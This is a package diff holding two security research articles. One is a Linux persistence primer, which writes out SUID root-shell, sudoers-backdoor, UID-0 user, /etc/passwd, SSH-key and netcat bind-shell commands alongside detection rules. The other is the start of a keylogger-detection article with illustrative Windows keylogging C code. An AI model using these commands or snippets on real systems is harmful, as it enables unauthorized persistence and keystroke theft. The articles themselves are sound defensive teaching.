More information by MITRE on this technique is available at [T1548.001](https://attack.mitre.org/techniques/T1548/001/).\n\n### Persistence through T1548.001 - setuid and setgid\n\nThis method requires root privileges, as it sets the SUID bit on a set of executables: \n\n```\nsudo ./panix.sh --suid --default\n[+] SUID privilege granted to /usr/bin/find\n[+] SUID privilege granted to /usr/bin/dash\n[-] python is not present on the system.\n[+] SUID privilege granted to /usr/bin/python3 \n```\n\nAfter setting the SUID bit on these binaries, they can be executed in a manner that allows the user to retain root privileges:\n\n```\n/usr/bin/find . -exec /bin/sh -p \\; -quit\nwhoami\nroot\n```\n\nLooking at the events this generates, we can see a discrepancy between the effective user ID and the real user ID:\n\n\n\nAfter executing PANIX with `sudo`, SUID permissions were granted to `/usr/bin/find`, `/usr/bin/dash`, and `/usr/bin/python3` using `chmod`. Subsequently, `/usr/bin/find` was utilized to run `/bin/sh` with privileged mode (`-p`) to obtain a root shell. Typically, the real user ID of a process matches the effective user ID. However, there are exceptions, such as when using `sudo`, `su`, or, as demonstrated here, a SUID binary, where the real user ID differs. 
Using our knowledge of GTFOBins and the execution chain, we can detect several indicators of SUID and SGID abuse.\n\n| Category | Coverage |\n|----------|------------------------------------|\n| Process | [SUID/SGUID Enumeration Detected](https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_suid_sguid_enumeration.toml) |\n| | [Setuid / Setgid Bit Set via chmod](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml) |\n| | [Privilege Escalation via SUID/SGID](https://github.com/elastic/detection-rules/blob/main/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml) |\n\n### Hunting for T1548.001 - setuid and setgid\n\nThe simplest and most effective way of hunting for SUID and SGID files is to search the filesystem for these files through OSQuery and take note of unusual ones. The [OSQuery SUID Hunting](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/privilege_escalation_via_suid_binaries.toml) rule can help you hunt for this technique.\n\n## T1548.003 - abuse elevation control mechanism: sudo and sudo caching (sudoers file modification)\n\nThe `sudo` command allows users to execute commands with superuser or other user privileges. The sudoers file manages [sudo permissions](https://linux.die.net/man/5/sudoers), dictating who can use sudo and which commands they can run. The main configuration file is located at `/etc/sudoers`.\n\nThis file contains global settings and user-specific rules for sudo access. Additionally, there is a directory used to store additional sudoers configuration files at `/etc/sudoers.d/`. Each file in this directory is treated as an extension of the main sudoers file, allowing for modular and organized sudo configurations. \n\nBoth system administrators and threat actors can misconfigure the sudoers file and its extensions. 
A common accidental misconfiguration might be overly permissive rules that grant users more access than necessary. Conversely, a threat actor with root access can deliberately modify these files to ensure they maintain elevated access.\n\nAn example of a misconfiguration or backdoor that allows an attacker to run any command as any user without a password prompt looks like this:\n\n```\nAttacker ALL=(ALL) NOPASSWD:ALL\n```\n\nBy exploiting such misconfigurations, an attacker can maintain persistent root access. For example, with the above backdoored configuration, the attacker can gain a root shell by executing `sudo /bin/bash`. Like the previous technique, MITRE classifies this one as privilege escalation/defense evasion; that classification holds, but it is also a way of establishing persistence. More information on T1548.003 can be found [here](https://attack.mitre.org/techniques/T1548/003/).\n\n### Persistence through T1548.003 - sudoers file modification\n\nThe `sudo -l` command can be used to list the allowed (and forbidden) commands for the user on the current host. By default, a non-root user cannot run any commands using sudo without specifying a password. 
\n\n```\nsudo -l\n[sudo] password for attacker:\n```\n\nLet’s add a backdoor entry for the `attacker` user:\n\n```\nsudo ./panix.sh --sudoers --username attacker\n[+] User attacker can now run all commands without a sudo password.\n```\n\nAfter adding a backdoor in the sudoers file and rerunning the `sudo -l` command, we see that the attacker can now run any command on the system with sudo without specifying a password.\n\n```\n> sudo -l\n> User attacker may run the following commands on ubuntu-persistence-research:\n> (ALL : ALL) ALL\n> (ALL) NOPASSWD: ALL \n```\n\nAfter planting this backdoor, few traces are left behind other than the creation of the `/etc/sudoers.d/attacker` file.\n\n\n\nThis backdoor can also be established by appending to the `/etc/sudoers` file itself, which would not generate a file creation event; such a modification can instead be captured via FIM.\n\n| Category | Coverage |\n|----------|--------------------------------------------------------------|\n| File | [Sudoers File Modification](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Potential Privilege Escalation via Sudoers File Modification](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml) |\n\n### Hunting for T1548.003 - sudoers file modification\n\nOSQuery provides a module that displays all sudoers files and rules through a simple and effective live hunt, available at [Privilege Escalation Identification via Existing Sudoers File](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/privilege_escalation_via_existing_sudoers.toml).\n\n## T1098/T1136 - account manipulation/creation\n\nPersistence can be established through the creation or modification 
of user accounts. By manipulating user credentials or permissions, attackers can ensure long-term access to a compromised system. This section covers various methods of achieving persistence through user account manipulation. MITRE divides this section into [T1098](https://attack.mitre.org/techniques/T1098/) (account manipulation) and [T1136](https://attack.mitre.org/techniques/T1136/) (create account).\n\n### T1136.001 - create account: local account\n\nCreating a new user account is a straightforward way to establish persistence. An attacker with root privileges can add a new user, ensuring they maintain access to the system even if other backdoors are removed. For example:\n\n```\nuseradd -m -s /bin/bash backdooruser\necho 'backdooruser:password' | chpasswd\n```\n\nThis creates a new user called `backdooruser` with a password of `password`.\n\n### T1098 - account manipulation: user credential modification\n\nModifying the credentials of an existing user can also provide persistent access. This might involve changing the password of a privileged user account.\n\n```\necho 'targetuser:newpassword' | chpasswd\n```\n\nThis changes the password for `targetuser` to `newpassword`.\n\n### T1098 - account manipulation: direct /etc/passwd file modification\n\nDirectly writing to the `/etc/passwd` file is another method for modifying user accounts. This approach allows attackers to manually add or modify user entries, potentially avoiding detection.\n\n```\necho \"malicioususer:<openssl-hash>:0:0:root:/root:/bin/bash\" >> /etc/passwd\n```\n\nWhere `<openssl-hash>` is a hash that can be generated through `openssl passwd \"$password\"`.\n\nThe command above creates a new user `malicioususer` with UID and GID 0, making it root-equivalent, and sets its password to the supplied hash. 
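The hash referenced above can be produced with OpenSSL. A short sketch (the password is a placeholder; the `-6` option for SHA-512 crypt hashes requires OpenSSL 1.1.1 or later):

```
# Generate a SHA-512 crypt hash for the placeholder password
HASH=$(openssl passwd -6 'password')

# Assemble the root-equivalent /etc/passwd entry; appending it to
# /etc/passwd would require root, so it is only printed here
echo "malicioususer:${HASH}:0:0:root:/root:/bin/bash"
```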
Similarly, this attack can be performed on the `/etc/shadow` file, by replacing the hash for a user’s password with a known hash.\n\n### T1136.001 - create account: backdoor user creation\n\nA backdoor user is a user account created or modified specifically to maintain access to the system. This account often has elevated privileges and is intended to be difficult to detect. One method involves creating a user with a UID of 0, effectively making it a root-equivalent user. This approach is detailed in a blog post called [Backdoor users on Linux with uid=0](https://embracethered.com/blog/posts/2021/linux-user-uid-zero-backdoor/).\n\n```\nuseradd -ou 0 -g 0 -m -d /root -s /bin/bash backdoorroot\necho 'backdoorroot:password' | chpasswd\n```\n\nThis creates a new user `backdoorroot` with UID 0, giving it root privileges.\n\n### T1098 - account manipulation: user added to privileged group\n\nAdding an existing user to a privileged group, such as the sudo group, can elevate their permissions, allowing them to execute commands with superuser privileges.\n\n```\nusermod -aG sudo existinguser\n```\n\nThis adds `existinguser` to the sudo group.\n\n### Persistence through T1098/T1136 - account manipulation/creation\n\nAll of these techniques are trivial to execute manually, but they are also built into PANIX in case you want to analyze the logs using a binary rather than a manual action. As the events generated by these techniques are not very interesting, we will not analyze them individually. 
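Several of these manipulations leave artifacts that can be checked directly on a live system. For example, a UID-0 backdoor account such as `backdoorroot` above stands out with a standard `awk` one-liner (a quick manual check, complementary to the detection rules below):

```
# List every account with UID 0 other than root itself;
# on a clean system this prints nothing
awk -F: '$3 == 0 && $1 != "root" {print $1}' /etc/passwd
```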
We detect all the techniques described above through a vast set of detection rules.\n\n| Category | Coverage |\n|----------|------------------------------------------------|\n| File | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| | [Shadow File Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_user_password_change.toml) |\n| Process | [Potential Linux Backdoor User Account Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_backdoor_user_creation.toml) |\n| IAM | [Linux Group Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_group_creation.toml) |\n| | [Linux User Added to Privileged Group](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_user_added_to_privileged_group.toml) |\n| | [Linux User Account Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_user_account_creation.toml) |\n| | [User or Group Creation/Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_user_or_group_creation_or_modification.toml) |\n\n### Hunting for T1098/T1136 - account manipulation/creation\n\nThere are many ways to hunt for these techniques. The above detection rules can be added as a timelines query to look back at a longer duration of time, the `/var/log/auth.log` (and equivalents on other Linux distributions) can be parsed and read, and OSQuery can be leveraged to read user info from a running system. 
The [Privilege Escalation/Persistence via User/Group Creation and/or Modification](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_user_group_creation_modification.toml) hunt rule contains several OSQuery queries to hunt for these techniques.\n\n## T1098.004 - account manipulation: SSH\n\n[Secure Shell (SSH)](https://linux.die.net/man/1/ssh) is a protocol to securely access remote systems. It leverages public/private key pairs to authenticate users, providing a more secure alternative to password-based logins. The SSH keys consist of a private key, kept secure by the user, and a public key, shared with the remote system.\n\nThe default locations for user-specific SSH key files and configuration files are as follows:\n\n* `~/.ssh/id_rsa`\n* `~/.ssh/id_rsa.pub`\n* `~/.ssh/authorized_keys`\n* `/root/.ssh/id_rsa`\n* `/root/.ssh/id_rsa.pub`\n* `/root/.ssh/authorized_keys`\n\nA system-wide configuration is present in:\n\n* `/etc/ssh/`\n\nThe private key remains on the client machine, while the public key is copied to the remote server’s `authorized_keys` file. This setup allows the user to authenticate with the server without entering a password.\n\nSSH keys are used to authenticate remote login sessions via SSH and for services like Secure Copy Protocol (SCP) and Secure File Transfer Protocol (SFTP), which allow secure file transfers between machines.\n\nAn attacker can establish persistence on a compromised host by adding their public key to the `authorized_keys` file of a user with sufficient privileges. This ensures they can regain access to the system even if the user changes their password. This persistence method is stealthy as built-in shell commands can be used, which are commonly more difficult to capture as a data source. 
Additionally, it does not rely on creating new user accounts or modifying system binaries.\n\n### Persistence through T1098.004 - SSH modification\n\nAs before, PANIX can be used to establish persistence through SSH. It can also be tested by manually adding a new key to `~/.ssh/authorized_keys`, or by creating a new public/private key pair on the system. If you want to test these techniques, you can execute the following PANIX command to establish persistence by creating a new key:\n\n```\n./panix.sh --ssh-key --default\nSSH key generated:\nPrivate key: /home/user/.ssh/id_rsa18220\nPublic key: /home/user/.ssh/id_rsa1822.pub\n[+] SSH key persistence established.\n```\n\nUse the following PANIX command to add a new public key to the authorized_keys file:\n\n```\n./panix.sh --authorized-keys --default --key \n[+] Persistence added to /home/user/.ssh/authorized_keys\n```\n\nFor file modification events, we can leverage FIM. We have several detection rules covering this technique in place.\n\n| Category | Coverage |\n|----------|---------------------------------------------|\n| File | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [SSH Key Generated via ssh-keygen](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_ssh_key_generation.toml) |\n\nA note on leveraging the “Potential Persistence via File Modification” rule: due to FIM’s limited wildcard support, the FIM configuration should be adapted to represent your environment’s public/private key and authorized_keys file locations. 
MITRE provides additional information on this technique in [T1098.004](https://attack.mitre.org/techniques/T1098/004/).\n\n### Hunting for T1098.004 - SSH modification\n\nThe main focuses while hunting for SSH persistence are newly added public/private keys, file changes related to the `authorized_keys` files, and configuration changes. We can leverage OSQuery to hunt for all three through the queries in the [Persistence via SSH Configurations and/or Keys](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_ssh_configurations_and_keys.toml) hunt.\n\n## T1059.004 - command and scripting interpreter: bind shells\n\n[A bind shell](https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/) is a remote access tool allowing an attacker to connect to a compromised system. Unlike reverse shells, which connect back to the attacker’s machine, a bind shell listens for incoming connections on the compromised host. This allows the attacker to connect at will, gaining command execution on the target machine.\n\nA bind shell typically involves the following steps:\n\n1. Listening Socket: The compromised system opens a network socket and listens for incoming connections on a specific port.\n2. Binding the Shell: When a connection is established, the system binds a command shell (such as `/bin/bash` or `/bin/sh`) to the socket.\n3. Remote Access: The attacker connects to the bind shell using a network client (like `netcat`) and gains access to the command shell on the compromised system.\n\nAn attacker can set up a bind shell in various ways, ranging from simple one-liners to more sophisticated scripts. 
Here is an example of a bind shell using the traditional version of netcat:\n\n```\nnc -lvnp 9001 -e /bin/bash\n```\n\nOnce the bind shell is set up, the attacker can connect to it from their machine:\n\n```\nnc -nv <target-ip> 9001\n```\n\nTo maintain persistence, the bind shell must be set to start automatically upon system boot or reboot. This can be achieved through various methods we discussed earlier, such as `cron`, `systemd`, or methods discussed in the next part of this Linux detection engineering series.\n\nMITRE does not have a specific bind/reverse shell technique and likely classifies bind shells under the command and scripting interpreter execution technique. However, the bind shell is used for persistence in our use case. Some more information from MITRE on bind/reverse shells is available at [T1059.004](https://attack.mitre.org/techniques/T1059/004/).\n\n### Persistence through T1059.004 - bind shells\n\nDetecting bind shells through behavioral rules is inherently challenging because their behavior is typically benign and indistinguishable from legitimate processes. A bind shell opens a network socket and waits for an incoming connection, a common activity for many legitimate services. When an attacker connects, it merely results in a network connection and the initiation of a shell session, which are both normal operations on a system.\n\nDue to behavioral detection's limitations, the most reliable method for identifying bind shells is static signature detection. This approach involves scanning the file system or memory for known shellcode patterns associated with bind shells.\n\nBy leveraging static signatures, we can identify and prevent bind shells more effectively than relying solely on behavioral analysis. 
This approach helps detect the specific code sequences used by bind shells, regardless of their behavior, ensuring a more robust defense against this type of persistence mechanism.\n\nAs all of our signature-based detections are open-source, you can check them out by visiting our [protections-artifacts YARA repository](https://github.com/elastic/protections-artifacts/tree/main/yara/rules). If you want to analyze this method within your tooling, you can leverage PANIX to set up a bind shell and connect to it using `nc`. To do so, execute the following command:\n\n```\n./panix.sh --bind-shell --default --architecture x64\n[+] Bind shell /tmp/bd64 was created, executed and backgrounded.\n[+] The bind shell is listening on port 9001.\n[+] To interact with it from a different system, use: nc -nv <ip> 9001\n[+] Bind shell persistence established!\n```\n\n### Hunting for T1059.004 - bind shells\n\nAlthough writing solid behavioral detection rules that do not regularly produce false positives is nearly impossible, hunting for bind shells is not. Based on the behavior of a bind shell, we know that we can look for long-running processes, listening ports, and listening sockets. To do so, we can leverage OSQuery. Several hunts are available for this scenario within the [Persistence Through Reverse/Bind Shells](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_reverse_bind_shells.toml) hunting rule.\n\n## T1059.004 - command and scripting interpreter: reverse shells\n\nReverse shells are utilized in many of the persistence techniques discussed in this article and will be further explored in upcoming parts. While specific rules for detecting reverse shells were not added to many of the techniques above, they are very relevant. 
To maintain consistency and ensure comprehensive coverage, the following detection and endpoint rules are included to capture these persistence mechanisms.\n\n| Category | Coverage |\n|----------|--------------------------------------------|\n| Process | [Suspicious Execution via setsid and nohup](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_suspicious_execution_via_setsid_and_nohup.toml) |\n| | [Suspicious Execution via a Hidden Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_suspicious_execution_via_a_hidden_process.toml) |\n| Network | [Linux Reverse Shell](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell.toml) |\n| | [Linux Reverse Shell via Child](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell_via_child.toml) |\n| | [Linux Reverse Shell via Netcat](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell_via_netcat.toml) |\n| | [Linux Reverse Shell via Suspicious Utility](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell_via_suspicious_utility.toml) |\n| | [Linux Reverse Shell via setsid and nohup](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_reverse_shell_via_setsid_and_nohup.toml) |\n| | [Potential Meterpreter Reverse Shell](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_meterpreter_linux.toml) |\n| | [Potential Reverse Shell via UDP](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_udp_cli_utility_linux.toml) |\n\n## Conclusion\n\nIn this part of the “Linux Detection Engineering” series, we looked into the basics of Linux persistence. 
If you missed the first part of the series, which focused on detection engineering with Auditd, you can catch up [here](https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd). This article explored various persistence techniques, including scheduled tasks, systemd services, shell profile modifications, XDG autostart configurations, SUID/SGID binaries, sudoers rules, user and group creation/modification, SSH key and authorized_keys modifications, and bind and reverse shells.\n\nNot only did the explanation cover how each persistence method operates, but it also provided practical demonstrations of configuring them using a straightforward tool called [PANIX](https://github.com/Aegrah/PANIX). This hands-on approach enabled you to test the coverage of these techniques using your preferred security product. Additionally, we discussed hunting strategies for each method, ranging from ES|QL aggregation queries to live hunt queries with OSQuery.\n\nWe hope you found this format helpful. In the next article, we'll explore more advanced and lesser-known persistence methods used in the wild. Until then, happy hunting!"
+ },
+ "title": "Linux Detection Engineering - A primer on persistence mechanisms",
+ "slug": "primer-on-persistence-mechanisms",
+ "subtitle": "A walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques.",
+ "date": "2024-08-21",
+ "description": "In this second part of the Linux Detection Engineering series, we map multiple Linux persistence mechanisms to the MITRE ATT&CK framework, explain how they work, and how to detect them.",
+ "author": [
+ {
+ "slug": "ruben-groenewoud"
+ }
+ ],
+ "image": "primer-on-persistence-mechanisms.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "linux",
+ "persistence"
+ ]
+ },
+ "id": "security_labs_content-primer_on_persistence_mechanisms-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection-md.json
new file mode 100644
index 00000000000..d2854adec49
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection-md.json
@@ -0,0 +1,36 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Protecting your devices from information theft\"\nslug: \"protecting-your-devices-from-information-theft-keylogger-protection\"\ndate: \"2024-05-30\"\nsubtitle: \"Keylogger detection using Windows API behaviors\"\ndescription: \"In this article, we will introduce the keylogger and keylogging detection features added this year to Elastic Defend (starting from version 8.12), which is responsible for endpoint protection in Elastic Security.\"\nauthor:\n- slug: asuka-nakajima\nimage: \"Security Labs Images 10.jpg\"\ncategory:\n - slug: security-operations\n - slug: security-research\n - slug: detection-science\ntags:\n - detection engineering\n - threat hunting\n - threat detection\n---\n\nIn this article, we will introduce the keylogger and keylogging detection features added this year to Elastic Defend (starting from [version 8.12](https://www.elastic.co/guide/en/security/8.12/release-notes-header-8.12.0.html#enhancements-8.12.0)), which is responsible for endpoint protection in Elastic Security. This article is also available in [Japanese](https://www.elastic.co/security-labs/protecting-your-devices-from-information-theft-keylogger-protection-jp).\n\n## Introduction\n\nStarting with Elastic Defend 8.12, we have enhanced the detection of keyloggers and malware with keylogging capabilities (such as information-stealing malware or remote access trojans, better known as RATs) on Windows by monitoring and recording the calls to representative Windows APIs used by keyloggers. This publication will focus on providing a detailed technical background of this new feature. Additionally, we will introduce the new prebuilt behavioral detection rules created in conjunction with this feature.\n\n### What is a keylogger and what are their risks?\n\nA keylogger is a type of software that monitors and records the keystrokes entered on a computer (※1). 
While keyloggers can be used for legitimate purposes such as user monitoring, they are frequently abused by malicious actors. Specifically, they are used to steal sensitive information such as authentication credentials, credit card details, and various confidential data entered through the keyboard. (※1: While there are hardware keyloggers that can be attached directly to a PC via USB, this article focuses on software keyloggers.)\n\nThe sensitive information obtained through keyloggers can be exploited for monetary theft or as a stepping stone for further cyber attacks. Therefore, although keylogging itself does not directly damage the computer, early detection is crucial to preventing subsequent, more invasive cyber attacks.\n\nThere are many types of malware with keylogging capabilities, particularly RATs, information stealers, and banking malware. Some well-known malware with keylogging functionality includes [Agent Tesla](https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla), [LokiBot](https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot), and [SnakeKeylogger](https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger).\n\n### How are keystrokes stolen?\n\nNext, let's explain from a technical perspective how keyloggers function without being detected. While keyloggers can be used within various operating system environments (Windows/Linux/macOS and mobile devices), this article will focus on Windows keyloggers. Specifically, we will describe four distinct types of keyloggers that capture keystrokes using Windows APIs and functions (※2).\n\nAs a side note, the reason for explaining keylogging methods here is to deepen the understanding of the new detection features introduced in the latter half of this article. 
Therefore, the example code provided is for illustrative purposes only and is not intended to be executable as is (※3).\n\n(※2: Keyloggers running on Windows can be broadly divided into those installed in kernel space (OS side) and those installed in the same space as regular applications (user space). This article focuses on the latter type.)\n(※3: If a keylogger is created and misused based on the example code provided below, Elastic will not be responsible for any consequences.)\n\n 1. Polling-based keylogger\n\nThis type of keylogger polls or periodically checks the state of each key on the keyboard (whether the key is pressed) at short intervals (much shorter than one second). If a keylogger detects that a new key has been pressed since the last check, it records and saves the information of the pressed key. By repeating this process, the keylogger captures the characters entered by the user.\n\nPolling-based keyloggers are implemented using Windows APIs that check the state of key inputs, with the [```GetAsyncKeyState```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate) API being a representative example. This API can determine whether a specific key is currently pressed and whether that key has been pressed since the last API call. Below is a simple example of a polling-based keylogger using the ```GetAsyncKeyState``` API:\n\n``` c\nwhile(true)\n{\n for (int key = 1; key <= 255; key++)\n {\n if (GetAsyncKeyState(key) & 0x01)\n {\n SaveTheKey(key, \"log.txt\");\n }\n }\n Sleep(50);\n}\n```\n\nThe method of polling (```GetAsyncKeyState```) to capture key press states is not only a well-known, classic keylogging technique, but it is also commonly used by malware today.\n\n 2. Hooking-based keylogger\n \nHooking-based keyloggers, like polling-based keyloggers, are a classic type that has been around for a long time. 
Let's first explain what a \"hook\" is.\n\nA hook is a mechanism that allows you to insert custom processing (custom code) into specific operations of an application. Using a hook to insert custom processing is known as \"hooking.\"\n\nWindows provides a mechanism that allows you to hook messages (events) such as key inputs to an application, and this can be utilized through the [```SetWindowsHookEx```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexw) API. Below is a simple example of a hooking-based keylogger using the ```SetWindowsHookEx``` API:\n\n``` c\nHMODULE hHookLibrary = LoadLibraryW(L\"hook.dll\");\nFARPROC hookFunc = GetProcAddress(hHookLibrary, \"SaveTheKey\");\n\nHHOOK keyboardHook = NULL;\n \nkeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL,\n (HOOKPROC)hookFunc,\n hHookLibrary,\n 0);\n```\n\n 3. Keylogger using the Raw Input Model\n \nThis type of keylogger captures and records raw input data obtained directly from input devices like keyboards. Before delving into the details of this type of keylogger, it's essential to understand the \"Original Input Model\" and \"Raw Input Model\" in Windows. Here's an explanation of each input method:\n\n - **Original Input Model**: The data entered from input devices like keyboards is processed by the OS before being delivered to the application.\n - **Raw Input Model**: The data entered from input devices is received directly by the application without any intermediate processing by the OS.\n \nInitially, Windows only used the Original Input Model. However, with the introduction of Windows XP, the Raw Input Model was added, likely due to the increasing diversity of input devices. In the Raw Input Model, the [```RegisterRawInputDevices```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerrawinputdevices) API is used to register the input devices from which you want to receive raw data directly. 
Subsequently, the [```GetRawInputData```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getrawinputdata) API is used to obtain the raw data.\n\nBelow is a simple example of a keylogger using the Raw Input Model and these APIs:\n\n``` c\nLRESULT CALLBACK WndProc(HWND hWnd, UINT uMessage, WPARAM wParam, LPARAM lParam)\n{\n\n UINT dwSize = 0;\n RAWINPUT* buffer = NULL;\n\n switch (uMessage)\n {\n case WM_CREATE:\n RAWINPUTDEVICE rid;\n rid.usUsagePage = 0x01; // HID_USAGE_PAGE_GENERIC\n rid.usUsage = 0x06; // HID_USAGE_GENERIC_KEYBOARD\n rid.dwFlags = RIDEV_NOLEGACY | RIDEV_INPUTSINK;\n rid.hwndTarget = hWnd;\n RegisterRawInputDevices(&rid, 1, sizeof(rid));\n break;\n case WM_INPUT:\n GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER));\n\n buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);\n\n if (GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize, sizeof(RAWINPUTHEADER)))\n {\n if (buffer->header.dwType == RIM_TYPEKEYBOARD)\n {\n SaveTheKey(buffer, \"log.txt\");\n }\n }\n HeapFree(GetProcessHeap(), 0, buffer);\n break;\n default:\n return DefWindowProc(hWnd, uMessage, wParam, lParam);\n }\n return 0;\n}\n```\n\nIn this example, ```RegisterRawInputDevices``` is used to register the input devices from which raw input data is to be received. Here, it is set to receive raw input data from the keyboard.\n\n 4. Keylogger using ```DirectInput```\n \nFinally, let's discuss a keylogger that uses ```DirectInput```. In simple terms, this keylogger abuses the functionalities of Microsoft DirectX. DirectX is a collection of APIs (libraries) used for handling multimedia tasks such as games and videos.\n\nSince obtaining various inputs from users is essential in gaming, DirectX also provides APIs for processing user inputs. The APIs provided before DirectX version 8 are known as ```DirectInput```. Below is a simple example of a keylogger using related APIs. 
As a side note, when acquiring key states using ```DirectInput```, the ```RegisterRawInputDevices``` API is called in the background.\n\n``` c\nLPDIRECTINPUT8\t\tlpDI = NULL;\nLPDIRECTINPUTDEVICE8\tlpKeyboard = NULL;\n\nBYTE key[256];\nZeroMemory(key, sizeof(key));\n\nDirectInput8Create(hInstance, DIRECTINPUT_VERSION, IID_IDirectInput8, (LPVOID*)&lpDI, NULL);\nlpDI->CreateDevice(GUID_SysKeyboard, &lpKeyboard, NULL);\nlpKeyboard->SetDataFormat(&c_dfDIKeyboard);\nlpKeyboard->SetCooperativeLevel(hwndMain, DISCL_FOREGROUND | DISCL_NONEXCLUSIVE | DISCL_NOWINKEY);\n\nwhile(true)\n{\n HRESULT ret = lpKeyboard->GetDeviceState(sizeof(key), key);\n if (FAILED(ret)) {\n lpKeyboard->Acquire();\n lpKeyboard->GetDeviceState(sizeof(key), key);\n }\n SaveTheKey(key, \"log.txt\");\t\n Sleep(50);\n}\n```\n\n## Detecting keyloggers by monitoring Windows API calls\n\nElastic Defend uses Event Tracing for Windows (ETW ※4) to detect the aforementioned keylogger types. This is achieved by monitoring calls to related Windows APIs and logging particularly anomalous behavior. Below are the Windows APIs being monitored and the newly created keylogger detection rules associated with these APIs. 
(※4: In short, ETW is a mechanism provided by Microsoft for tracing and logging the execution of applications and system components in Windows, such as device drivers.)\n\n### Monitored Windows APIs:\n\n - [GetAsyncKeyState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate)\n - [SetWindowsHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexw)\n - [RegisterRawInputDevices](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerrawinputdevices)\n\n### New keylogger endpoint detection rules:\n\n - [GetAsyncKeyState API Call from Suspicious Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_suspicious_process.toml)\n - [GetAsyncKeyState API Call from Unusual Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_unusual_process.toml)\n - [Keystroke Input Capture via DirectInput](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_directinput.toml)\n - [Keystroke Input Capture via RegisterRawInputDevices](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml)\n - [Keystroke Messages Hooking via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_messages_hooking_via_setwindowshookex.toml)\n - [Keystrokes Input Capture from a Managed Application](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_managed_application.toml)\n - [Keystrokes Input Capture from a Suspicious Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_suspicious_module.toml)\n - [Keystrokes Input Capture from 
